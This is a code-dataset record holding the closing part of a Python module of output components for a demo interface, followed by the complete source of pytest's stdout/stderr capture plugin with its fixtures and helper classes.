ff = FFmpeg(inputs={y: None}, outputs={output_file_name: None})
ff.run()
y = output_file_name
return {
"name": os.path.basename(y),
"data": processing_utils.encode_file_to_base64(y),
}
def deserialize(self, x):
return processing_utils.decode_base64_to_file(x).name
def save_flagged(self, dir, label, data, encryption_key):
return self.save_flagged_file(dir, label, data["data"], encryption_key)
def restore_flagged(self, dir, data, encryption_key):
return self.restore_flagged_file(dir, data, encryption_key)
class KeyValues(OutputComponent):
"""
Component displays a table representing values for multiple fields.
Output type: Union[Dict, List[Tuple[str, Union[str, int, float]]]]
Demos: text_analysis
"""
def __init__(self, label: Optional[str] = None):
"""
Parameters:
label (str): component name in interface.
"""
super().__init__(label)
def postprocess(self, y):
"""
Parameters:
y (Union[Dict, List[Tuple[str, Union[str, int, float]]]]): dictionary or tuple list representing key value pairs
Returns:
(List[Tuple[str, Union[str, number]]]): list of key value pairs
"""
if isinstance(y, dict):
return list(y.items())
elif isinstance(y, list):
return y
else:
raise ValueError(
"The `KeyValues` output interface expects an output that is a dictionary whose keys are "
"labels and values are corresponding values."
)
@classmethod
def get_shortcut_implementations(cls):
return {
"key_values": {},
}
def save_flagged(self, dir, label, data, encryption_key):
return json.dumps(data)
def restore_flagged(self, dir, data, encryption_key):
return json.loads(data)
class HighlightedText(OutputComponent):
"""
Component creates text that contains spans that are highlighted by category or numerical value.
Output is represent as a list of Tuple pairs, where the first element represents the span of text represented by the tuple, and the second element represents the category or value of the text.
Output type: List[Tuple[str, Union[float, str]]]
Demos: diff_texts, text_analysis
"""
def __init__(
self,
color_map: Dict[str, str] = None,
label: Optional[str] = None,
show_legend: bool = False,
):
"""
Parameters:
color_map (Dict[str, str]): Map between category and respective colors
label (str): component name in interface.
show_legend (bool): whether to show span categories in a separate legend or inline.
"""
self.color_map = color_map
self.show_legend = show_legend
super().__init__(label)
def get_template_context(self):
return {
"color_map": self.color_map,
"show_legend": self.show_legend,
**super().get_template_context(),
}
@classmethod
def get_shortcut_implementations(cls):
return {
"highlight": {},
}
def postprocess(self, y):
"""
Parameters:
y (Union[Dict, List[Tuple[str, Union[str, int, float]]]]): dictionary or tuple list representing key value pairs
Returns:
(List[Tuple[str, Union[str, number]]]): list of key value pairs
"""
return y
def save_flagged(self, dir, label, data, encryption_key):
return json.dumps(data)
def restore_flagged(self, dir, data, encryption_key):
return json.loads(data)
class Audio(OutputComponent):
"""
Creates an audio player that plays the output audio.
Output type: Union[Tuple[int, numpy.array], str]
Demos: generate_tone, reverse_audio
"""
def __init__(self, type: str = "auto", label: Optional[str] = None):
"""
Parameters:
type (str): Type of value to be passed to component. "numpy" returns a 2-set tuple with an integer sample_rate and the data as 16-bit int numpy.array of shape (samples, 2), "file" returns a temporary file path to the saved wav audio file, "auto" detects return type.
label (str): component name in interface.
"""
self.type = type
super().__init__(label)
def get_template_context(self):
return {**super().get_template_context()}
@classmethod
def get_shortcut_implementations(cls):
return {
"audio": {},
}
def postprocess(self, y):
"""
Parameters:
y (Union[Tuple[int, numpy.array], str]): audio data in requested format
Returns:
(str): base64 url data
"""
if self.type in ["numpy", "file", "auto"]:
if self.type == "numpy" or (self.type == "auto" and isinstance(y, tuple)):
sample_rate, data = y
file = tempfile.NamedTemporaryFile(
prefix="sample", suffix=".wav", delete=False
)
processing_utils.audio_to_file(sample_rate, data, file.name)
y = file.name
return processing_utils.encode_url_or_file_to_base64(y)
else:
raise ValueError(
"Unknown type: " + self.type + ". Please choose from: 'numpy', 'file'."
)
def deserialize(self, x):
return processing_utils.decode_base64_to_file(x).name
def save_flagged(self, dir, label, data, encryption_key):
return self.save_flagged_file(dir, label, data, encryption_key)
def restore_flagged(self, dir, data, encryption_key):
return self.restore_flagged_file(dir, data, encryption_key)["data"]
class JSON(OutputComponent):
"""
Used for JSON output. Expects a JSON string or a Python object that is JSON serializable.
Output type: Union[str, Any]
Demos: zip_to_json
"""
def __init__(self, label: Optional[str] = None):
"""
Parameters:
label (str): component name in interface.
"""
super().__init__(label)
def postprocess(self, y):
"""
Parameters:
y (Union[Dict, List, str]): JSON output
Returns:
(Union[Dict, List]): JSON output
"""
if isinstance(y, str):
return json.dumps(y)
else:
return y
@classmethod
def get_shortcut_implementations(cls):
return {
"json": {},
}
def save_flagged(self, dir, label, data, encryption_key):
return json.dumps(data)
def restore_flagged(self, dir, data, encryption_key):
return json.loads(data)
class HTML(OutputComponent):
"""
Used for HTML output. Expects an HTML valid string.
Output type: str
Demos: text_analysis
"""
def __init__(self, label: Optional[str] = None):
"""
Parameters:
label (str): component name in interface.
"""
super().__init__(label)
def postprocess(self, x):
"""
Parameters:
y (str): HTML output
Returns:
(str): HTML output
"""
return x
@classmethod
def get_shortcut_implementations(cls):
return {
"html": {},
}
class File(OutputComponent):
"""
Used for file output.
Output type: Union[file-like, str]
Demos: zip_two_files
"""
def __init__(self, label: Optional[str] = None):
"""
Parameters:
label (str): component name in interface.
"""
super().__init__(label)
@classmethod
def get_shortcut_implementations(cls):
return {
"file": {},
}
def postprocess(self, y):
"""
Parameters:
y (str): file path
Returns:
(Dict[name: str, size: number, data: str]): JSON object with key 'name' for filename, 'data' for base64 url, and 'size' for filesize in bytes
"""
return {
"name": os.path.basename(y),
"size": os.path.getsize(y),
"data": processing_utils.encode_file_to_base64(y),
}
def save_flagged(self, dir, label, data, encryption_key):
return self.save_flagged_file(dir, label, data["data"], encryption_key)
def restore_flagged(self, dir, data, encryption_key):
return self.restore_flagged_file(dir, data, encryption_key)
class Dataframe(OutputComponent):
"""
Component displays 2D output through a spreadsheet interface.
Output type: Union[pandas.DataFrame, numpy.array, List[Union[str, float]], List[List[Union[str, float]]]]
Demos: filter_records, matrix_transpose, fraud_detector
"""
def __init__(
self,
headers: Optional[List[str]] = None,
max_rows: Optional[int] = 20,
max_cols: Optional[int] = None,
overflow_row_behaviour: str = "paginate",
type: str = "auto",
label: Optional[str] = None,
):
"""
Parameters:
headers (List[str]): Header names to dataframe. Only applicable if type is "numpy" or "array".
max_rows (int): Maximum number of rows to display at once. Set to None for infinite.
max_cols (int): Maximum number of columns to display at once. Set to None for infinite.
overflow_row_behaviour (str): If set to "paginate", will create pages for overflow rows. If set to "show_ends", will show initial and final rows and truncate middle rows.
type (str): Type of value to be passed to component. "pandas" for pandas dataframe, "numpy" for numpy array, or "array" for Python array, "auto" detects return type.
label (str): component name in interface.
"""
self.headers = headers
self.max_rows = max_rows
self.max_cols = max_cols
self.overflow_row_behaviour = overflow_row_behaviour
self.type = type
super().__init__(label)
def get_template_context(self):
return {
"headers": self.headers,
"max_rows": self.max_rows,
"max_cols": self.max_cols,
"overflow_row_behaviour": self.overflow_row_behaviour,
**super().get_template_context(),
}
@classmethod
def get_shortcut_implementations(cls):
return {
"dataframe": {},
"numpy": {"type": "numpy"},
"matrix": {"type": "array"},
"list": {"type": "array"},
}
def postprocess(self, y):
"""
Parameters:
y (Union[pandas.DataFrame, numpy.array, List[Union[str, float]], List[List[Union[str, float]]]]): dataframe in given format
Returns:
(Dict[headers: List[str], data: List[List[Union[str, number]]]]): JSON object with key 'headers' for list of header names, 'data' for 2D array of string or numeric data
"""
if self.type == "auto":
if isinstance(y, pd.core.frame.DataFrame):
dtype = "pandas"
elif isinstance(y, np.ndarray):
dtype = "numpy"
elif isinstance(y, list):
dtype = "array"
else:
dtype = self.type
if dtype == "pandas":
return {"headers": list(y.columns), "data": y.values.tolist()}
elif dtype in ("numpy", "array"):
if dtype == "numpy":
y = y.tolist()
if len(y) == 0 or not isinstance(y[0], list):
y = [y]
return {"data": y}
else:
raise ValueError(
"Unknown type: "
+ self.type
+ ". Please choose from: 'pandas', 'numpy', 'array'."
)
def save_flagged(self, dir, label, data, encryption_key):
return json.dumps(data["data"])
def restore_flagged(self, dir, data, encryption_key):
return {"data": json.loads(data)}
class Carousel(OutputComponent):
"""
Component displays a set of output components that can be scrolled through.
Output type: List[List[Any]]
Demos: disease_report
"""
def __init__(
self,
components: OutputComponent | List[OutputComponent],
label: Optional[str] = None,
):
"""
Parameters:
components (Union[List[OutputComponent], OutputComponent]): Classes of component(s) that will be scrolled through.
label (str): component name in interface.
"""
if not isinstance(components, list):
components = [components]
self.components = [get_output_instance(component) for component in components]
super().__init__(label)
def get_template_context(self):
return {
"components": [
component.get_template_context() for component in self.components
],
**super().get_template_context(),
}
def postprocess(self, y):
"""
Parameters:
y (List[List[Any]]): carousel output
Returns:
(List[List[Any]]): 2D array, where each sublist represents one set of outputs or 'slide' in the carousel
"""
if isinstance(y, list):
if len(y) != 0 and not isinstance(y[0], list):
y = [[z] for z in y]
output = []
for row in y:
output_row = []
for i, cell in enumerate(row):
output_row.append(self.components[i].postprocess(cell))
output.append(output_row)
return output
else:
raise ValueError("Unknown type. Please provide a list for the Carousel.")
def save_flagged(self, dir, label, data, encryption_key):
return json.dumps(
[
[
component.save_flagged(
dir, f"{label}_{j}", data[i][j], encryption_key
)
for j, component in enumerate(self.components)
]
for i, _ in enumerate(data)
]
)
def restore_flagged(self, dir, data, encryption_key):
return [
[
component.restore_flagged(dir, sample, encryption_key)
for component, sample in zip(self.components, sample_set)
]
for sample_set in json.loads(data)
]
class Timeseries(OutputComponent):
"""
Component accepts pandas.DataFrame.
Output type: pandas.DataFrame
Demos: fraud_detector
"""
def __init__(
self, x: str = None, y: str | List[str] = None, label: Optional[str] = None
):
"""
Parameters:
x (str): Column name of x (time) series. None if csv has no headers, in which case first column is x series.
y (Union[str, List[str]]): Column name of y series, or list of column names if multiple series. None if csv has no headers, in which case every column after first is a y series.
label (str): component name in interface.
"""
self.x = x
if isinstance(y, str):
y = [y]
self.y = y
super().__init__(label)
def get_template_context(self):
return {"x": self.x, "y": self.y, **super().get_template_context()}
@classmethod
def get_shortcut_implementations(cls):
return {
"timeseries": {},
}
def postprocess(self, y):
"""
Parameters:
y (pandas.DataFrame): timeseries data
Returns:
(Dict[headers: List[str], data: List[List[Union[str, number]]]]): JSON object with key 'headers' for list of header names, 'data' for 2D array of string or numeric data
"""
return {"headers": y.columns.values.tolist(), "data": y.values.tolist()}
def save_flagged(self, dir, label, data, encryption_key):
"""
Returns: (List[List[Union[str, float]]]) 2D array
"""
return json.dumps(data)
def restore_flagged(self, dir, data, encryption_key):
return json.loads(data)
class State(OutputComponent):
"""
Special hidden component that stores state across runs of the interface.
Output type: Any
Demos: chatbot
"""
def __init__(self, label: Optional[str] = None):
"""
Parameters:
label (str): component name in interface (not used).
"""
super().__init__(label)
@classmethod
def get_shortcut_implementations(cls):
return {
"state": {},
}
def get_output_instance(iface: Interface):
if isinstance(iface, str):
shortcut = OutputComponent.get_all_shortcut_implementations()[iface]
return shortcut[0](**shortcut[1])
# a dict with `name` as the output component type and other keys as parameters
elif isinstance(iface, dict):
name = iface.pop("name")
for component in OutputComponent.__subclasses__():
if component.__name__.lower() == name:
break
else:
raise ValueError("No such OutputComponent: {}".format(name))
return component(**iface)
elif isinstance(iface, OutputComponent):
return iface
else:
raise ValueError(
"Output interface must be of type `str` or `dict` or"
"`OutputComponent` but is {}".format(iface)
)
| 33.736591
| 289
| 0.581735
|
e144495e27aca0f9ece82a2e2fe2d42705ec5444
| 26,547
|
py
|
Python
|
src/_pytest/capture.py
|
dougthor42/pytest
|
0118f1c081dcd1c6b6de49bc2f7fa5bc2494753b
|
[
"MIT"
] | null | null | null |
src/_pytest/capture.py
|
dougthor42/pytest
|
0118f1c081dcd1c6b6de49bc2f7fa5bc2494753b
|
[
"MIT"
] | null | null | null |
src/_pytest/capture.py
|
dougthor42/pytest
|
0118f1c081dcd1c6b6de49bc2f7fa5bc2494753b
|
[
"MIT"
] | null | null | null |
"""
per-test stdout/stderr capturing mechanism.
"""
import collections
import contextlib
import io
import os
import sys
from io import UnsupportedOperation
from tempfile import TemporaryFile
import pytest
from _pytest.compat import CaptureIO
from _pytest.fixtures import FixtureRequest
patchsysdict = {0: "stdin", 1: "stdout", 2: "stderr"}
def pytest_addoption(parser):
group = parser.getgroup("general")
group._addoption(
"--capture",
action="store",
default="fd" if hasattr(os, "dup") else "sys",
metavar="method",
choices=["fd", "sys", "no"],
help="per-test capturing method: one of fd|sys|no.",
)
group._addoption(
"-s",
action="store_const",
const="no",
dest="capture",
help="shortcut for --capture=no.",
)
@pytest.hookimpl(hookwrapper=True)
def pytest_load_initial_conftests(early_config, parser, args):
ns = early_config.known_args_namespace
if ns.capture == "fd":
_py36_windowsconsoleio_workaround(sys.stdout)
_colorama_workaround()
_readline_workaround()
pluginmanager = early_config.pluginmanager
capman = CaptureManager(ns.capture)
pluginmanager.register(capman, "capturemanager")
# make sure that capturemanager is properly reset at final shutdown
early_config.add_cleanup(capman.stop_global_capturing)
# finally trigger conftest loading but while capturing (issue93)
capman.start_global_capturing()
outcome = yield
capman.suspend_global_capture()
if outcome.excinfo is not None:
out, err = capman.read_global_capture()
sys.stdout.write(out)
sys.stderr.write(err)
class CaptureManager:
"""
Capture plugin, manages that the appropriate capture method is enabled/disabled during collection and each
test phase (setup, call, teardown). After each of those points, the captured output is obtained and
attached to the collection/runtest report.
There are two levels of capture:
* global: which is enabled by default and can be suppressed by the ``-s`` option. This is always enabled/disabled
during collection and each test phase.
* fixture: when a test function or one of its fixture depend on the ``capsys`` or ``capfd`` fixtures. In this
case special handling is needed to ensure the fixtures take precedence over the global capture.
"""
def __init__(self, method):
self._method = method
self._global_capturing = None
self._current_item = None
def __repr__(self):
return "<CaptureManager _method={!r} _global_capturing={!r} _current_item={!r}>".format(
self._method, self._global_capturing, self._current_item
)
def _getcapture(self, method):
if method == "fd":
return MultiCapture(out=True, err=True, Capture=FDCapture)
elif method == "sys":
return MultiCapture(out=True, err=True, Capture=SysCapture)
elif method == "no":
return MultiCapture(out=False, err=False, in_=False)
raise ValueError("unknown capturing method: %r" % method) # pragma: no cover
def is_capturing(self):
if self.is_globally_capturing():
return "global"
capture_fixture = getattr(self._current_item, "_capture_fixture", None)
if capture_fixture is not None:
return (
"fixture %s" % self._current_item._capture_fixture.request.fixturename
)
return False
# Global capturing control
def is_globally_capturing(self):
return self._method != "no"
def start_global_capturing(self):
assert self._global_capturing is None
self._global_capturing = self._getcapture(self._method)
self._global_capturing.start_capturing()
def stop_global_capturing(self):
if self._global_capturing is not None:
self._global_capturing.pop_outerr_to_orig()
self._global_capturing.stop_capturing()
self._global_capturing = None
def resume_global_capture(self):
# During teardown of the python process, and on rare occasions, capture
# attributes can be `None` while trying to resume global capture.
if self._global_capturing is not None:
self._global_capturing.resume_capturing()
def suspend_global_capture(self, in_=False):
cap = getattr(self, "_global_capturing", None)
if cap is not None:
cap.suspend_capturing(in_=in_)
def suspend(self, in_=False):
# Need to undo local capsys-et-al if it exists before disabling global capture.
self.suspend_fixture(self._current_item)
self.suspend_global_capture(in_)
def resume(self):
self.resume_global_capture()
self.resume_fixture(self._current_item)
def read_global_capture(self):
return self._global_capturing.readouterr()
# Fixture Control (it's just forwarding, think about removing this later)
def activate_fixture(self, item):
"""If the current item is using ``capsys`` or ``capfd``, activate them so they take precedence over
the global capture.
"""
fixture = getattr(item, "_capture_fixture", None)
if fixture is not None:
fixture._start()
def deactivate_fixture(self, item):
"""Deactivates the ``capsys`` or ``capfd`` fixture of this item, if any."""
fixture = getattr(item, "_capture_fixture", None)
if fixture is not None:
fixture.close()
def suspend_fixture(self, item):
fixture = getattr(item, "_capture_fixture", None)
if fixture is not None:
fixture._suspend()
def resume_fixture(self, item):
fixture = getattr(item, "_capture_fixture", None)
if fixture is not None:
fixture._resume()
# Helper context managers
@contextlib.contextmanager
def global_and_fixture_disabled(self):
"""Context manager to temporarily disable global and current fixture capturing."""
self.suspend()
try:
yield
finally:
self.resume()
@contextlib.contextmanager
def item_capture(self, when, item):
self.resume_global_capture()
self.activate_fixture(item)
try:
yield
finally:
self.deactivate_fixture(item)
self.suspend_global_capture(in_=False)
out, err = self.read_global_capture()
item.add_report_section(when, "stdout", out)
item.add_report_section(when, "stderr", err)
# Hooks
@pytest.hookimpl(hookwrapper=True)
def pytest_make_collect_report(self, collector):
if isinstance(collector, pytest.File):
self.resume_global_capture()
outcome = yield
self.suspend_global_capture()
out, err = self.read_global_capture()
rep = outcome.get_result()
if out:
rep.sections.append(("Captured stdout", out))
if err:
rep.sections.append(("Captured stderr", err))
else:
yield
@pytest.hookimpl(hookwrapper=True)
def pytest_runtest_protocol(self, item):
self._current_item = item
yield
self._current_item = None
@pytest.hookimpl(hookwrapper=True)
def pytest_runtest_setup(self, item):
with self.item_capture("setup", item):
yield
@pytest.hookimpl(hookwrapper=True)
def pytest_runtest_call(self, item):
with self.item_capture("call", item):
yield
@pytest.hookimpl(hookwrapper=True)
def pytest_runtest_teardown(self, item):
with self.item_capture("teardown", item):
yield
@pytest.hookimpl(tryfirst=True)
def pytest_keyboard_interrupt(self, excinfo):
self.stop_global_capturing()
@pytest.hookimpl(tryfirst=True)
def pytest_internalerror(self, excinfo):
self.stop_global_capturing()
capture_fixtures = {"capfd", "capfdbinary", "capsys", "capsysbinary"}
def _ensure_only_one_capture_fixture(request: FixtureRequest, name):
fixtures = sorted(set(request.fixturenames) & capture_fixtures - {name})
if fixtures:
arg = fixtures[0] if len(fixtures) == 1 else fixtures
raise request.raiseerror(
"cannot use {} and {} at the same time".format(arg, name)
)
@pytest.fixture
def capsys(request):
"""Enable text capturing of writes to ``sys.stdout`` and ``sys.stderr``.
The captured output is made available via ``capsys.readouterr()`` method
calls, which return a ``(out, err)`` namedtuple.
``out`` and ``err`` will be ``text`` objects.
"""
_ensure_only_one_capture_fixture(request, "capsys")
with _install_capture_fixture_on_item(request, SysCapture) as fixture:
yield fixture
@pytest.fixture
def capsysbinary(request):
"""Enable bytes capturing of writes to ``sys.stdout`` and ``sys.stderr``.
The captured output is made available via ``capsysbinary.readouterr()``
method calls, which return a ``(out, err)`` namedtuple.
``out`` and ``err`` will be ``bytes`` objects.
"""
_ensure_only_one_capture_fixture(request, "capsysbinary")
with _install_capture_fixture_on_item(request, SysCaptureBinary) as fixture:
yield fixture
@pytest.fixture
def capfd(request):
"""Enable text capturing of writes to file descriptors ``1`` and ``2``.
The captured output is made available via ``capfd.readouterr()`` method
calls, which return a ``(out, err)`` namedtuple.
``out`` and ``err`` will be ``text`` objects.
"""
_ensure_only_one_capture_fixture(request, "capfd")
if not hasattr(os, "dup"):
pytest.skip(
"capfd fixture needs os.dup function which is not available in this system"
)
with _install_capture_fixture_on_item(request, FDCapture) as fixture:
yield fixture
@pytest.fixture
def capfdbinary(request):
"""Enable bytes capturing of writes to file descriptors ``1`` and ``2``.
The captured output is made available via ``capfd.readouterr()`` method
calls, which return a ``(out, err)`` namedtuple.
``out`` and ``err`` will be ``byte`` objects.
"""
_ensure_only_one_capture_fixture(request, "capfdbinary")
if not hasattr(os, "dup"):
pytest.skip(
"capfdbinary fixture needs os.dup function which is not available in this system"
)
with _install_capture_fixture_on_item(request, FDCaptureBinary) as fixture:
yield fixture
@contextlib.contextmanager
def _install_capture_fixture_on_item(request, capture_class):
"""
Context manager which creates a ``CaptureFixture`` instance and "installs" it on
the item/node of the given request. Used by ``capsys`` and ``capfd``.
The CaptureFixture is added as attribute of the item because it needs to accessed
by ``CaptureManager`` during its ``pytest_runtest_*`` hooks.
"""
request.node._capture_fixture = fixture = CaptureFixture(capture_class, request)
capmanager = request.config.pluginmanager.getplugin("capturemanager")
# Need to active this fixture right away in case it is being used by another fixture (setup phase).
# If this fixture is being used only by a test function (call phase), then we wouldn't need this
# activation, but it doesn't hurt.
capmanager.activate_fixture(request.node)
yield fixture
fixture.close()
del request.node._capture_fixture
class CaptureFixture:
"""
Object returned by :py:func:`capsys`, :py:func:`capsysbinary`, :py:func:`capfd` and :py:func:`capfdbinary`
fixtures.
"""
def __init__(self, captureclass, request):
self.captureclass = captureclass
self.request = request
self._capture = None
self._captured_out = self.captureclass.EMPTY_BUFFER
self._captured_err = self.captureclass.EMPTY_BUFFER
def _start(self):
if self._capture is None:
self._capture = MultiCapture(
out=True, err=True, in_=False, Capture=self.captureclass
)
self._capture.start_capturing()
def close(self):
if self._capture is not None:
out, err = self._capture.pop_outerr_to_orig()
self._captured_out += out
self._captured_err += err
self._capture.stop_capturing()
self._capture = None
def readouterr(self):
"""Read and return the captured output so far, resetting the internal buffer.
:return: captured content as a namedtuple with ``out`` and ``err`` string attributes
"""
captured_out, captured_err = self._captured_out, self._captured_err
if self._capture is not None:
out, err = self._capture.readouterr()
captured_out += out
captured_err += err
self._captured_out = self.captureclass.EMPTY_BUFFER
self._captured_err = self.captureclass.EMPTY_BUFFER
return CaptureResult(captured_out, captured_err)
def _suspend(self):
"""Suspends this fixture's own capturing temporarily."""
if self._capture is not None:
self._capture.suspend_capturing()
def _resume(self):
"""Resumes this fixture's own capturing temporarily."""
if self._capture is not None:
self._capture.resume_capturing()
@contextlib.contextmanager
def disabled(self):
"""Temporarily disables capture while inside the 'with' block."""
capmanager = self.request.config.pluginmanager.getplugin("capturemanager")
with capmanager.global_and_fixture_disabled():
yield
def safe_text_dupfile(f, mode, default_encoding="UTF8"):
""" return an open text file object that's a duplicate of f on the
FD-level if possible.
"""
encoding = getattr(f, "encoding", None)
try:
fd = f.fileno()
except Exception:
if "b" not in getattr(f, "mode", "") and hasattr(f, "encoding"):
# we seem to have a text stream, let's just use it
return f
else:
newfd = os.dup(fd)
if "b" not in mode:
mode += "b"
f = os.fdopen(newfd, mode, 0) # no buffering
return EncodedFile(f, encoding or default_encoding)
class EncodedFile:
errors = "strict" # possibly needed by py3 code (issue555)
def __init__(self, buffer, encoding):
self.buffer = buffer
self.encoding = encoding
def write(self, obj):
if isinstance(obj, str):
obj = obj.encode(self.encoding, "replace")
else:
raise TypeError(
"write() argument must be str, not {}".format(type(obj).__name__)
)
self.buffer.write(obj)
def writelines(self, linelist):
data = "".join(linelist)
self.write(data)
@property
def name(self):
"""Ensure that file.name is a string."""
return repr(self.buffer)
@property
def mode(self):
return self.buffer.mode.replace("b", "")
def __getattr__(self, name):
return getattr(object.__getattribute__(self, "buffer"), name)
CaptureResult = collections.namedtuple("CaptureResult", ["out", "err"])
class MultiCapture:
out = err = in_ = None
_state = None
def __init__(self, out=True, err=True, in_=True, Capture=None):
if in_:
self.in_ = Capture(0)
if out:
self.out = Capture(1)
if err:
self.err = Capture(2)
def __repr__(self):
return "<MultiCapture out={!r} err={!r} in_={!r} _state={!r} _in_suspended={!r}>".format(
self.out,
self.err,
self.in_,
self._state,
getattr(self, "_in_suspended", "<UNSET>"),
)
def start_capturing(self):
self._state = "started"
if self.in_:
self.in_.start()
if self.out:
self.out.start()
if self.err:
self.err.start()
def pop_outerr_to_orig(self):
""" pop current snapshot out/err capture and flush to orig streams. """
out, err = self.readouterr()
if out:
self.out.writeorg(out)
if err:
self.err.writeorg(err)
return out, err
def suspend_capturing(self, in_=False):
self._state = "suspended"
if self.out:
self.out.suspend()
if self.err:
self.err.suspend()
if in_ and self.in_:
self.in_.suspend()
self._in_suspended = True
def resume_capturing(self):
self._state = "resumed"
if self.out:
self.out.resume()
if self.err:
self.err.resume()
if hasattr(self, "_in_suspended"):
self.in_.resume()
del self._in_suspended
def stop_capturing(self):
""" stop capturing and reset capturing streams """
if self._state == "stopped":
raise ValueError("was already stopped")
self._state = "stopped"
if self.out:
self.out.done()
if self.err:
self.err.done()
if self.in_:
self.in_.done()
def readouterr(self):
""" return snapshot unicode value of stdout/stderr capturings. """
return CaptureResult(
self.out.snap() if self.out is not None else "",
self.err.snap() if self.err is not None else "",
)
class NoCapture:
EMPTY_BUFFER = None
__init__ = start = done = suspend = resume = lambda *args: None
class FDCaptureBinary:
"""Capture IO to/from a given os-level filedescriptor.
snap() produces `bytes`
"""
EMPTY_BUFFER = b""
_state = None
def __init__(self, targetfd, tmpfile=None):
self.targetfd = targetfd
try:
self.targetfd_save = os.dup(self.targetfd)
except OSError:
self.start = lambda: None
self.done = lambda: None
else:
self.start = self._start
self.done = self._done
if targetfd == 0:
assert not tmpfile, "cannot set tmpfile with stdin"
tmpfile = open(os.devnull, "r")
self.syscapture = SysCapture(targetfd)
else:
if tmpfile is None:
f = TemporaryFile()
with f:
tmpfile = safe_text_dupfile(f, mode="wb+")
if targetfd in patchsysdict:
self.syscapture = SysCapture(targetfd, tmpfile)
else:
self.syscapture = NoCapture()
self.tmpfile = tmpfile
self.tmpfile_fd = tmpfile.fileno()
def __repr__(self):
return "<FDCapture {} oldfd={} _state={!r}>".format(
self.targetfd, getattr(self, "targetfd_save", None), self._state
)
def _start(self):
""" Start capturing on targetfd using memorized tmpfile. """
try:
os.fstat(self.targetfd_save)
except (AttributeError, OSError):
raise ValueError("saved filedescriptor not valid anymore")
os.dup2(self.tmpfile_fd, self.targetfd)
self.syscapture.start()
self._state = "started"
def snap(self):
self.tmpfile.seek(0)
res = self.tmpfile.read()
self.tmpfile.seek(0)
self.tmpfile.truncate()
return res
def _done(self):
""" stop capturing, restore streams, return original capture file,
seeked to position zero. """
targetfd_save = self.__dict__.pop("targetfd_save")
os.dup2(targetfd_save, self.targetfd)
os.close(targetfd_save)
self.syscapture.done()
self.tmpfile.close()
self._state = "done"
def suspend(self):
self.syscapture.suspend()
os.dup2(self.targetfd_save, self.targetfd)
self._state = "suspended"
def resume(self):
self.syscapture.resume()
os.dup2(self.tmpfile_fd, self.targetfd)
self._state = "resumed"
def writeorg(self, data):
""" write to original file descriptor. """
if isinstance(data, str):
data = data.encode("utf8") # XXX use encoding of original stream
os.write(self.targetfd_save, data)
class FDCapture(FDCaptureBinary):
"""Capture IO to/from a given os-level filedescriptor.
snap() produces text
"""
# Ignore type because it doesn't match the type in the superclass (bytes).
EMPTY_BUFFER = str() # type: ignore
def snap(self):
res = super().snap()
enc = getattr(self.tmpfile, "encoding", None)
if enc and isinstance(res, bytes):
res = str(res, enc, "replace")
return res
class SysCapture:
CLOSE_STDIN = object
EMPTY_BUFFER = str()
_state = None
def __init__(self, fd, tmpfile=None, stdin=CLOSE_STDIN):
name = patchsysdict[fd]
self._old = getattr(sys, name)
self.name = name
if tmpfile is None:
if name == "stdin":
if stdin is self.CLOSE_STDIN:
tmpfile = DontReadFromInput()
else:
tmpfile = stdin
else:
tmpfile = CaptureIO()
self.tmpfile = tmpfile
def __repr__(self):
return "<SysCapture {} _old={!r}, tmpfile={!r} _state={!r}>".format(
self.name, self._old, self.tmpfile, self._state
)
def start(self):
setattr(sys, self.name, self.tmpfile)
self._state = "started"
def snap(self):
res = self.tmpfile.getvalue()
self.tmpfile.seek(0)
self.tmpfile.truncate()
return res
def done(self):
setattr(sys, self.name, self._old)
del self._old
self.tmpfile.close()
self._state = "done"
def suspend(self):
setattr(sys, self.name, self._old)
self._state = "suspended"
def resume(self):
setattr(sys, self.name, self.tmpfile)
self._state = "resumed"
def writeorg(self, data):
self._old.write(data)
self._old.flush()
class SysCaptureBinary(SysCapture):
# Ignore type because it doesn't match the type in the superclass (str).
EMPTY_BUFFER = b"" # type: ignore
def snap(self):
res = self.tmpfile.buffer.getvalue()
self.tmpfile.seek(0)
self.tmpfile.truncate()
return res
class DontReadFromInput:
encoding = None
def read(self, *args):
raise IOError(
"pytest: reading from stdin while output is captured! Consider using `-s`."
)
readline = read
readlines = read
__next__ = read
def __iter__(self):
return self
def fileno(self):
raise UnsupportedOperation("redirected stdin is pseudofile, has no fileno()")
def isatty(self):
return False
def close(self):
pass
@property
def buffer(self):
return self
def _colorama_workaround():
"""
Ensure colorama is imported so that it attaches to the correct stdio
handles on Windows.
colorama uses the terminal on import time. So if something does the
first import of colorama while I/O capture is active, colorama will
fail in various ways.
"""
if sys.platform.startswith("win32"):
try:
import colorama # noqa: F401
except ImportError:
pass
def _readline_workaround():
"""
Ensure readline is imported so that it attaches to the correct stdio
handles on Windows.
Pdb uses readline support where available--when not running from the Python
prompt, the readline module is not imported until running the pdb REPL. If
running pytest with the --pdb option this means the readline module is not
imported until after I/O capture has been started.
This is a problem for pyreadline, which is often used to implement readline
support on Windows, as it does not attach to the correct handles for stdout
and/or stdin if they have been redirected by the FDCapture mechanism. This
workaround ensures that readline is imported before I/O capture is setup so
that it can attach to the actual stdin/out for the console.
See https://github.com/pytest-dev/pytest/pull/1281
"""
if sys.platform.startswith("win32"):
try:
import readline # noqa: F401
except ImportError:
pass
def _py36_windowsconsoleio_workaround(stream):
"""
Python 3.6 implemented unicode console handling for Windows. This works
by reading/writing to the raw console handle using
``{Read,Write}ConsoleW``.
The problem is that we are going to ``dup2`` over the stdio file
descriptors when doing ``FDCapture`` and this will ``CloseHandle`` the
handles used by Python to write to the console. Though there is still some
weirdness and the console handle seems to only be closed randomly and not
on the first call to ``CloseHandle``, or maybe it gets reopened with the
same handle value when we suspend capturing.
The workaround in this case will reopen stdio with a different fd which
also means a different handle by replicating the logic in
"Py_lifecycle.c:initstdio/create_stdio".
:param stream: in practice ``sys.stdout`` or ``sys.stderr``, but given
here as parameter for unittesting purposes.
See https://github.com/pytest-dev/py/issues/103
"""
if (
not sys.platform.startswith("win32")
or sys.version_info[:2] < (3, 6)
or hasattr(sys, "pypy_version_info")
):
return
# bail out if ``stream`` doesn't seem like a proper ``io`` stream (#2666)
if not hasattr(stream, "buffer"):
return
buffered = hasattr(stream.buffer, "raw")
raw_stdout = stream.buffer.raw if buffered else stream.buffer
if not isinstance(raw_stdout, io._WindowsConsoleIO):
return
def _reopen_stdio(f, mode):
if not buffered and mode[0] == "w":
buffering = 0
else:
buffering = -1
return io.TextIOWrapper(
open(os.dup(f.fileno()), mode, buffering),
f.encoding,
f.errors,
f.newlines,
f.line_buffering,
)
sys.stdin = _reopen_stdio(sys.stdin, "rb")
sys.stdout = _reopen_stdio(sys.stdout, "wb")
sys.stderr = _reopen_stdio(sys.stderr, "wb")
| 32.178182
| 117
| 0.628207
